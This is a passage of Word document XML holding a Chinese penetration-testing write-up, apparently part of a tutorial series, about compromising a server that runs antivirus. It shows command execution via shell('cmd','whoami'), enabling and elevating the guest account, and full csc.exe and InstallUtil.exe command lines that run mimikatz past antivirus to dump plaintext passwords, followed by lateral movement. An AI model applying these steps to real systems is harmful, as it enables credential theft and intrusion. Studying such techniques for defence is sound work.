          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-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shell('cmd','whoami');"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需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>解决的第三个问题：登录服务器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78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在有套装的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环境下，默认拦截cmd下加帐号，而目前又无法抓取系统登录明文。mimikatz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被查杀。cmd下调用powershell被拦截。遂选择激活guest帐号，并提升到a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dministrators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组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，来临时登录目标机。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0.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId26" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:347.399pt;width:320.399pt;height:300.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index: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socks代理登录目标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机：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551.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,11037" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:11037;width:82;height:322" coordorigin="1177,11037" coordsize="82,322" path="m1217,11055l1217,11055,1217,11055,1217,11055,1217,11055,1217,11055,1217,11055,1217,11055,1217,11055,1217,11055,1217,11055,1217,11055,1217,11055,1217,11055,1217,11055,1217,11055,1217,11055,1217,11055,1217,11055,1217,11056,1217,11056,1217,11056,1217,11056,1217,11056,1217,11057,1217,11057,1217,11057,1217,11058,1217,11058,1217,11058,1217,11059,1217,11059,1217,11060,1217,11060,1217,11061,1217,11062,1217,11062,1217,11063,1217,11064,1217,11064,1217,11065,1217,11066,1217,11067,1217,11068,1217,11069,1217,11070,1217,11071,1217,11072,1217,11073,1217,11074,1217,11076,1217,11077,1217,11078,1217,11080,1217,11081,1217,11083,1217,11084,1217,11086,1217,11088,1217,11089,1217,11091,1217,11093,1217,11095,1217,11097,1217,11099,1217,11101,1217,11103,1217,11106,1217,11108,1217,11111,1217,11113,1217,11116,1217,11118,1217,11121,1217,11124,1217,11127,1217,11130,1217,11133,1217,11136,1217,11139,1217,11142,1217,11146,1217,11149,1217,11153,1217,11156,1217,11160,1217,11164,1217,11168,1217,11172,1217,11176,1217,11180,1217,11184,1217,11189,1217,11193,1217,11198,1217,11203,1217,11207,1217,11212,1217,11217,1217,11222,1217,11227,1217,11233,1217,11238,1217,11244,1217,11249,1217,11255,1217,11261,1217,11267,1217,11273,1217,11279,1217,11285,1217,11292,1217,11298,1217,11305,1217,11312,1217,11318,1217,11325,1217,11333,1217,11340,1217,11347,1217,11355e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:566.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,11337" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:11337;width:82;height:322" coordorigin="1177,11337" coordsize="82,322" path="m1217,11355l1217,11355,1217,11355,1217,11355,1217,11355,1217,11355,1217,11355,1217,11355,1217,11355,1217,11355,1217,11355,1217,11355,1217,11355,1217,11355,1217,11355,1217,11355,1217,11355,1217,11355,1217,11356,1217,11356,1217,11356,1217,11356,1217,11356,1217,11357,1217,11357,1217,11357,1217,11357,1217,11358,1217,11358,1217,11359,1217,11359,1217,11360,1217,11360,1217,11361,1217,11361,1217,11362,1217,11362,1217,11363,1217,11364,1217,11364,1217,11365,1217,11366,1217,11367,1217,11368,1217,11369,1217,11370,1217,11371,1217,11372,1217,11373,1217,11374,1217,11376,1217,11377,1217,11378,1217,11380,1217,11381,1217,11383,1217,11384,1217,11386,1217,11388,1217,11389,1217,11391,1217,11393,1217,11395,1217,11397,1217,11399,1217,11401,1217,11404,1217,11406,1217,11408,1217,11411,1217,11413,1217,11416,1217,11418,1217,11421,1217,11424,1217,11427,1217,11430,1217,11433,1217,11436,1217,11439,1217,11443,1217,11446,1217,11449,1217,11453,1217,11457,1217,11460,1217,11464,1217,11468,1217,11472,1217,11476,1217,11480,1217,11485,1217,11489,1217,11493,1217,11498,1217,11503,1217,11507,1217,11512,1217,11517,1217,11522,1217,11528,1217,11533,1217,11538,1217,11544,1217,11549,1217,11555,1217,11561,1217,11567,1217,11573,1217,11579,1217,11585,1217,11592,1217,11598,1217,11605,1217,11612,1217,11619,1217,11626,1217,11633,1217,11640,1217,11647,1217,11655e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:581.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,11637" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:11637;width:82;height:322" coordorigin="1177,11637" coordsize="82,322" path="m1217,11655l1217,11655,1217,11655,1217,11655,1217,11655,1217,11655,1217,11655,1217,11655,1217,11655,1217,11655,1217,11655,1217,11655,1217,11655,1217,11655,1217,11655,1217,11655,1217,11655,1217,11656,1217,11656,1217,11656,1217,11656,1217,11656,1217,11657,1217,11657,1217,11657,1217,11657,1217,11658,1217,11658,1217,11658,1217,11659,1217,11659,1217,11660,1217,11660,1217,11661,1217,11661,1217,11662,1217,11663,1217,11663,1217,11664,1217,11665,1217,11665,1217,11666,1217,11667,1217,11668,1217,11669,1217,11670,1217,11671,1217,11672,1217,11673,1217,11675,1217,11676,1217,11677,1217,11678,1217,11680,1217,11681,1217,11683,1217,11684,1217,11686,1217,11688,1217,11690,1217,11691,1217,11693,1217,11695,1217,11697,1217,11699,1217,11702,1217,11704,1217,11706,1217,11708,1217,11711,1217,11713,1217,11716,1217,11719,1217,11721,1217,11724,1217,11727,1217,11730,1217,11733,1217,11736,1217,11739,1217,11743,1217,11746,1217,11750,1217,11753,1217,11757,1217,11760,1217,11764,1217,11768,1217,11772,1217,11776,1217,11780,1217,11785,1217,11789,1217,11794,1217,11798,1217,11803,1217,11808,1217,11812,1217,11817,1217,11823,1217,11828,1217,11833,1217,11838,1217,11844,1217,11849,1217,11855,1217,11861,1217,11867,1217,11873,1217,11879,1217,11886,1217,11892,1217,11898,1217,11905,1217,11912,1217,11919,1217,11926,1217,11933,1217,11940,1217,11948,1217,11955e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:596.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,11937" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:11937;width:82;height:322" coordorigin="1177,11937" coordsize="82,322" path="m1217,11955l1217,11955,1217,11955,1217,11955,1217,11955,1217,11955,1217,11955,1217,11955,1217,11955,1217,11955,1217,11955,1217,11955,1217,11955,1217,11955,1217,11955,1217,11956,1217,11956,1217,11956,1217,11956,1217,11956,1217,11956,1217,11956,1217,11957,1217,11957,1217,11957,1217,11957,1217,11958,1217,11958,1217,11959,1217,11959,1217,11959,1217,11960,1217,11960,1217,11961,1217,11961,1217,11962,1217,11963,1217,11963,1217,11964,1217,11965,1217,11966,1217,11966,1217,11967,1217,11968,1217,11969,1217,11970,1217,11971,1217,11972,1217,11974,1217,11975,1217,11976,1217,11977,1217,11979,1217,11980,1217,11982,1217,11983,1217,11985,1217,11986,1217,11988,1217,11990,1217,11992,1217,11993,1217,11995,1217,11997,1217,12000,1217,12002,1217,12004,1217,12006,1217,12009,1217,12011,1217,12014,1217,12016,1217,12019,1217,12021,1217,12024,1217,12027,1217,12030,1217,12033,1217,12036,1217,12040,1217,12043,1217,12046,1217,12050,1217,12053,1217,12057,1217,12061,1217,12064,1217,12068,1217,12072,1217,12076,1217,12081,1217,12085,1217,12089,1217,12094,1217,12098,1217,12103,1217,12108,1217,12113,1217,12118,1217,12123,1217,12128,1217,12133,1217,12139,1217,12144,1217,12150,1217,12155,1217,12161,1217,12167,1217,12173,1217,12179,1217,12186,1217,12192,1217,12199,1217,12205,1217,12212,1217,12219,1217,12226,1217,12233,1217,12240,1217,12248,1217,12255e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:653.874pt;width:4.125pt;height:61.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,13077" coordsize="82,1222">
        <v:shape style="position:absolute;left:1177;top:13077;width:82;height:1222" coordorigin="1177,13077" coordsize="82,1222" path="m1217,13096l1217,13096,1217,13096,1217,13096,1217,13096,1217,13096,1217,13096,1217,13096,1217,13096,1217,13096,1217,13096,1217,13096,1217,13097,1217,13097,1217,13097,1217,13098,1217,13098,1217,13099,1217,13099,1217,13100,1217,13100,1217,13101,1217,13102,1217,13103,1217,13104,1217,13105,1217,13107,1217,13108,1217,13110,1217,13111,1217,13113,1217,13115,1217,13117,1217,13119,1217,13121,1217,13124,1217,13126,1217,13129,1217,13132,1217,13135,1217,13138,1217,13141,1217,13145,1217,13148,1217,13152,1217,13156,1217,13161,1217,13165,1217,13170,1217,13174,1217,13179,1217,13185,1217,13190,1217,13196,1217,13202,1217,13208,1217,13214,1217,13221,1217,13228,1217,13235,1217,13242,1217,13249,1217,13257,1217,13265,1217,13274,1217,13282,1217,13291,1217,13300,1217,13310,1217,13320,1217,13330,1217,13340,1217,13351,1217,13362,1217,13373,1217,13384,1217,13396,1217,13408,1217,13421,1217,13434,1217,13447,1217,13460,1217,13474,1217,13488,1217,13503,1217,13518,1217,13533,1217,13549,1217,13565,1217,13581,1217,13598,1217,13615,1217,13632,1217,13650,1217,13669,1217,13687,1217,13706,1217,13726,1217,13746,1217,13766,1217,13787,1217,13808,1217,13830,1217,13852,1217,13874,1217,13897,1217,13920,1217,13944,1217,13968,1217,13993,1217,14018,1217,14044,1217,14070,1217,14097,1217,14124,1217,14151,1217,14179,1217,14208,1217,14237,1217,14266,1217,14296e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:713.874pt;width:4.125pt;height:17.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,14277" coordsize="82,342">
        <v:shape style="position:absolute;left:1177;top:14277;width:82;height:342" coordorigin="1177,14277" coordsize="82,342" path="m1217,14296l1217,14296,1217,14296,1217,14296,1217,14296,1217,14296,1217,14296,1217,14296,1217,14296,1217,14296,1217,14296,1217,14296,1217,14296,1217,14297,1217,14297,1217,14297,1217,14297,1217,14297,1217,14297,1217,14297,1217,14297,1217,14298,1217,14298,1217,14298,1217,14298,1217,14299,1217,14299,1217,14299,1217,14300,1217,14300,1217,14301,1217,14301,1217,14302,1217,14302,1217,14303,1217,14304,1217,14304,1217,14305,1217,14306,1217,14306,1217,14307,1217,14308,1217,14309,1217,14310,1217,14311,1217,14312,1217,14313,1217,14314,1217,14316,1217,14317,1217,14318,1217,14320,1217,14321,1217,14322,1217,14324,1217,14326,1217,14327,1217,14329,1217,14331,1217,14333,1217,14335,1217,14337,1217,14339,1217,14341,1217,14343,1217,14345,1217,14348,1217,14350,1217,14352,1217,14355,1217,14358,1217,14360,1217,14363,1217,14366,1217,14369,1217,14372,1217,14375,1217,14378,1217,14382,1217,14385,1217,14388,1217,14392,1217,14396,1217,14399,1217,14403,1217,14407,1217,14411,1217,14415,1217,14419,1217,14424,1217,14428,1217,14433,1217,14437,1217,14442,1217,14447,1217,14452,1217,14457,1217,14462,1217,14467,1217,14472,1217,14478,1217,14483,1217,14489,1217,14495,1217,14501,1217,14507,1217,14513,1217,14519,1217,14525,1217,14532,1217,14538,1217,14545,1217,14552,1217,14559,1217,14566,1217,14573,1217,14581,1217,14588,1217,14596,1217,14603,1217,14611e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:729.874pt;width:4.125pt;height:31.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,14597" coordsize="82,622">
        <v:shape style="position:absolute;left:1177;top:14597;width:82;height:622" coordorigin="1177,14597" coordsize="82,622" path="m1217,14611l1217,14611,1217,14611,1217,14611,1217,14611,1217,14611,1217,14611,1217,14611,1217,14611,1217,14612,1217,14612,1217,14612,1217,14612,1217,14612,1217,14612,1217,14612,1217,14613,1217,14613,1217,14613,1217,14613,1217,14614,1217,14614,1217,14615,1217,14615,1217,14616,1217,14616,1217,14617,1217,14618,1217,14618,1217,14619,1217,14620,1217,14621,1217,14622,1217,14623,1217,14624,1217,14625,1217,14627,1217,14628,1217,14629,1217,14631,1217,14632,1217,14634,1217,14636,1217,14638,1217,14640,1217,14642,1217,14644,1217,14646,1217,14648,1217,14651,1217,14653,1217,14656,1217,14659,1217,14661,1217,14664,1217,14667,1217,14671,1217,14674,1217,14677,1217,14681,1217,14685,1217,14688,1217,14692,1217,14696,1217,14700,1217,14705,1217,14709,1217,14714,1217,14718,1217,14723,1217,14728,1217,14734,1217,14739,1217,14744,1217,14750,1217,14756,1217,14762,1217,14768,1217,14774,1217,14780,1217,14787,1217,14794,1217,14801,1217,14808,1217,14815,1217,14822,1217,14830,1217,14838,1217,14846,1217,14854,1217,14862,1217,14871,1217,14880,1217,14889,1217,14898,1217,14907,1217,14917,1217,14927,1217,14936,1217,14947,1217,14957,1217,14968,1217,14978,1217,14989,1217,15001,1217,15012,1217,15024,1217,15036,1217,15048,1217,15060,1217,15073,1217,15085,1217,15099,1217,15112,1217,15125,1217,15139,1217,15153,1217,15167,1217,15182,1217,15197,1217,15212e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:467.400pt;height:232.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId2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需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>解决的第四个问题：抓取目标机明文密码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登录服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>器后，目前依然不知道目标机的密码。这里有两种方向来解决该问题。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一：关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>我能关闭的套装，由于管理员没有注销登录。能关闭的有限。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二：分离免杀做mimikatz密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码抓取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作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>者选择了第二种方案：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这里需要用到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>c</w:t>
      </w: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sc.exe，与InstallUtil.exe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77" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="5215" w:firstLine="-375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关于两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个文件默认安装位置：（注意x32，x64区别）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C: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\Windows\Microsoft.NET\Framework\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C:\Windows\Mic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rosoft.NET\Framework64\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C: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\Windows\Microsoft.NET\Framework\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C:\Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\Microsoft.NET\Framework64\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分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>别执行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="75" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="2846" w:firstLine="0"/>
      </w:pP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C:\Windows\Microsoft.NET\Fra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mework64\v4.0.30319\csc.exe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/r:System.EnterpriseServices.dll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/r:System.IO.Compression.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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/target:library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/out:Micropoor.exe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/keyfile:C:\Users\Johnn\Desktop\installutil.snk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/unsafe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C:\Users\Johnn\Desktop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\mimi.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="319" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="2675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C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-73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/logfile=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/LogToConsole=false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7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/U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C:\Users\Johnn\Desktop\Micropoor.exe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5.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId29" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:352.800pt;width:467.400pt;height:274.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId3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派生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>出的第五个问题：横向渗透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关于第五个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问题，本意并不是该篇幅所要讲述的，后续是搜集目标机的mssql，mysql，rdp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密码。搜</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>集所在内网的拓扑，来辅助本次的横向扩展。便完成了本次的项目。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如需具体，请参考我在Wiki上的系列教程7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8，79，12，13，71课时。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595.200pt;width:7.200pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId31" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:69.599pt;width:467.400pt;height:287.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId3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本次的整</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>个流程，并没有遇到太多的问题，仅仅是把几个知识点的串联起来，形成的一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个完整的渗透。也许你了解知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识点1，也了解知识点2，还了解知识点3等等。但是一次完整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的项目是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>离不开每一个知识点的串联与灵活运用。这应该是每一个信息安全从业人员值得思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考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="1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在每次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>分享的同时，深深发现，原来分享，才是我最好的老师。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